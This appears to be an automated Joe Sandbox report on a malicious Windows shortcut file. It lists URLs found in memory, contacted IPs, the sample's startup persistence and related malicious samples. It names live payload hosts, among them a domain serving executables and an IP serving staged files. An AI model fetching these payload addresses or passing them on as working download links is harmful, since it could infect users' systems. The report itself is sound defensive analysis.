                                                                                              https://tiffany-careers.com/FILEANH...Cmshta.exe, 00000004.00000002.2418270268.0000022B39803000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.14.drfalse
                                                                                                		high
                                                                                                https://g.live.com/odclientsettings/Prod1C:edb.log.7.drfalse
                                                                                                  		high
                                                                                                  https://www.google.com/chromecontent_new.js.13.drfalse
                                                                                                    		high
                                                                                                    https://www.tiktok.com/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                      		high
                                                                                                      https://tiffany-careers.com/FILEANHC:forfiles.exe, 00000000.00000002.2162274242.0000021612830000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2418270268.0000022B39803000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2415931699.0000022336C10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://tiffany-careers.com/FILEANHataFPS_BROWSEDmshta.exe, 00000004.00000002.2417096883.0000022336D50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://139.99.188.124powershell.exe, 0000001C.00000002.2428787870.00000281B4845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://tiffany-careers.com/FILEANH1mshta.exe, 00000004.00000002.2415931699.0000022336C36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://tiffany-careers.com/FILEANH.mshta.exe, 00000004.00000002.2416539000.0000022336CA4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403041983.0000022336CA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://chromewebstore.google.com/manifest.json.13.drfalse
                                                                                                          		high
                                                                                                          https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                            		high
                                                                                                            https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                              		high
                                                                                                              https://chrome.google.com/webstore/manifest.json.13.drfalse
                                                                                                                		high
                                                                                                                https://y.music.163.com/m/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                  		high
                                                                                                                  https://bard.google.com/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                    		high
                                                                                                                    https://tiffany-careers.com/FILEANHgramforfiles.exe, 00000000.00000002.2162201998.00000216127D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://tiffany-careers.com/fileanhforfiles.exe, 00000000.00000002.2162274242.000002161283C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://web.whatsapp.comee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                      		high
                                                                                                                      https://tiffany-careers.compowershell.exe, 00000008.00000002.2306595071.000001BE101F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2306595071.000001BE0FF6A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://m.kugou.com/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                        		high
                                                                                                                        https://www.office.comee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                          		high
                                                                                                                          https://outlook.live.com/mail/0/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                            		high
                                                                                                                            https://contoso.com/Licensepowershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://powerpoint.new?from=EdgeM365Shorelineee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                		high
                                                                                                                                https://tidal.com/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                  		high
                                                                                                                                  https://tiffany-careers.com/PefjSkkhb.exeppowershell.exe, 00000008.00000002.2306595071.000001BE101F0000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://tiffany-careers.com/fileanhAforfiles.exe, 00000000.00000002.2162274242.000002161283C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://gaana.com/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                    		high
                                                                                                                                    https://outlook.live.com/mail/compose?isExtension=trueee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                      		high
                                                                                                                                      https://contoso.com/powershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://oneget.orgXpowershell.exe, 0000001C.00000002.2428787870.00000281B4B3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=trueee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                            		high
                                                                                                                                            https://latest.web.skype.com/?browsername=edge_canary_shorelineee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                              		high
                                                                                                                                              https://word.new?from=EdgeM365Shorelineee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                		high
                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2347436380.000001BE1FDB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2525830239.00000281C355C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000001C.00000002.2428787870.00000281B4B3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=trueee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://outlook.office.com/mail/0/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demoee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://m.soundcloud.com/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://mail.google.com/mail/mu/mp/266/#tl/Inboxee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://tiffany-careers.com/FILEANHhttps://tiffany-careers.com/FILEANHPmshta.exe, 00000004.00000003.2408387399.0000022B3F065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://music.amazon.comee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000007.00000003.2190194676.0000016D6AC30000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedgeee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://open.spotify.comee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://twitter.com/ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://tiffany-careers.com/FILEANHsmshta.exe, 00000004.00000003.2403505478.0000022336C4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416251856.0000022336C4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown

                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public IPs

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        104.116.245.121
                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                        147.45.49.155
                                                                                                                                                                        		tiffany-careers.comRussian Federation
                                                                                                                                                                        		2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                        162.159.61.3
                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                        139.99.188.124
                                                                                                                                                                        		unknownCanada
                                                                                                                                                                        		16276OVHFRtrue
                                                                                                                                                                        23.44.203.84
                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                        239.255.255.250
                                                                                                                                                                        		unknownReserved
                                                                                                                                                                        		unknownunknownfalse
                                                                                                                                                                        142.250.181.65
                                                                                                                                                                        		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                        172.64.41.3
                                                                                                                                                                        		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                                                                        Private

                                                                                                                                                                        IP
                                                                                                                                                                        192.168.2.6
                                                                                                                                                                        127.0.0.1

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1577882
                                                                                                                                                                        Start date and time:2024-12-18 21:05:04 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 9m 42s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:38
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:R4qP4YM0QX.lnk
                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                        Original Sample Name:c994e4260593f7a34502021234dae6a9.lnk
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.expl.evad.winLNK@75/255@13/10
                                                                                                                                                                        EGA Information:
                                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 99%
                                                                                                                                                                        • Number of executed functions: 94
                                                                                                                                                                        • Number of non-executed functions: 276
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .lnk

                                                                                                                                                                        Warnings

                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.214.172, 23.218.208.109, 13.107.42.16, 13.107.21.239, 204.79.197.239, 172.217.17.78, 13.107.6.158, 23.200.87.141, 23.210.249.83, 142.250.176.195, 142.250.80.99, 142.251.40.195, 40.126.53.7, 20.103.156.88, 13.107.246.63, 104.116.245.83, 94.245.104.56, 20.12.23.50, 13.107.246.40, 23.44.136.133, 150.171.27.10, 2.19.193.114
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, clients2.google.com, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, config.edge.skype.com, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, cdp-f-tlu-net.trafficmanager.net, edge-microsoft-com.dual-a-0036.a-msedge.net, client.wns.windows.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, bzib.nelreports.net.akamaized.net, otelrules.azureedge.net, api.edgeoffer.microsoft.com, ctldl.windowsupdate.com, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.mic
                                                                                                                                                                        • Execution Graph export aborted for target mshta.exe, PID 1476 because there are no executed function
                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 612 because it is empty
                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 9152 because it is empty
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • VT rate limit hit for: R4qP4YM0QX.lnk

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        15:06:01API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                        15:06:02API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                                                                                                        15:06:03API Interceptor119x Sleep call for process: powershell.exe modified
                                                                                                                                                                        15:07:03API Interceptor1854x Sleep call for process: Guard.exe modified
                                                                                                                                                                        15:07:23API Interceptor613x Sleep call for process: SwiftWrite.pif modified
                                                                                                                                                                        21:06:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        162.159.61.3g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                          H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                            HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                              ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                  EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                        CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                          122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                            139.99.188.124R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/QWCheljD.txt
                                                                                                                                                                                            s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/EsgMle.txt
                                                                                                                                                                                            EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/ucZfzm.txt
                                                                                                                                                                                            RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/mzmLv.txt
                                                                                                                                                                                            S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/wPBPjuY.txt
                                                                                                                                                                                            PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/BlQMSgJx.txt
                                                                                                                                                                                            l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/jiJNz.txt
                                                                                                                                                                                            duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/QWCheljD.txt
                                                                                                                                                                                            pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/QWCheljD.txt
                                                                                                                                                                                            FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 139.99.188.124/EPDjSfs.txt
                                                                                                                                                                                            104.116.245.121https://u1.padletusercontent.com/uploads/padlet-uploads/3025704792/6a713d777f6a37c342ac9ff24818d63a/AContactinyourAddressBook.pdf?token=M4XZQk0-e0NegbPKN1EJFleeEg1SvAJHdhT-Qqn0IkrT5Su7By9B8urGCx2aLfmJMlgU5pPj_rq7vwJTjl3Mo83xjhy_G7fpTmckKxF_1H_Z492RSJiRSa3MofZP5-14SdBnispcHFsREDhhEifxgSR79jzwl3Q_R367A9ozgQRT4PbUB36zYP2FqxL7ZQfSwKjHH3FrzM2GPeTcuOwd8LrJMHGk1iqhNWgBjuGUF8BCo6b-0YxOTsq00c-_jwQFgXebvlVvdLX7cLMfAYfxPg==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              147.45.49.155R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • tiffany-careers.com/PefjSkkhb.exe
                                                                                                                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • tiffany-careers.com/BFmcYQ.exe
                                                                                                                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • tiffany-careers.com/PefjSkkhb.exe

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              chrome.cloudflare-dns.comg8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              ssl.bingadsedgeextension-prod-europe.azurewebsites.netH3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                              fg.microsoft.map.fastly.netko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                              pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                              IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                              cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                              • 199.232.214.172

                                                                                                                                                                                              ASNs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              FREE-NET-ASFREEnetEUR8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 147.45.49.155
                                                                                                                                                                                              boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 147.45.124.54
                                                                                                                                                                                              boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 147.45.124.54
                                                                                                                                                                                              boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 147.45.124.54
                                                                                                                                                                                              boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 147.45.124.54
                                                                                                                                                                                              boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 147.45.124.54
                                                                                                                                                                                              boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 147.45.124.54
                                                                                                                                                                                              boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 147.45.124.54
                                                                                                                                                                                              boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 147.45.124.54
                                                                                                                                                                                              CLOUDFLARENETUShttps://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                              sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 172.67.220.223
                                                                                                                                                                                              k6A01XaeEn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.21.21.99
                                                                                                                                                                                              https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.95.41
                                                                                                                                                                                              https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.26.6.189
                                                                                                                                                                                              solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.67.75.163
                                                                                                                                                                                              http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.66.0.227
                                                                                                                                                                                              g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                              solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.67.75.163
                                                                                                                                                                                              https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.16.123.96
                                                                                                                                                                                              AKAMAI-ASN1EUhttps://docs.google.com/forms/d/e/1FAIpQLSfpC7xVRv07m89Wl9UZXAneGiWD8iBvaXR4E1UxBoramir5pg/viewform?usp=headerGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 172.233.62.38
                                                                                                                                                                                              ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              http://www.mynylgbs.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 23.195.38.175
                                                                                                                                                                                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 96.17.102.118
                                                                                                                                                                                              zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              OVHFRR8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 139.99.188.124
                                                                                                                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 139.99.188.124
                                                                                                                                                                                              https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 51.68.39.188
                                                                                                                                                                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 176.31.190.89
                                                                                                                                                                                              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 51.195.114.88
                                                                                                                                                                                              la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 139.99.189.235
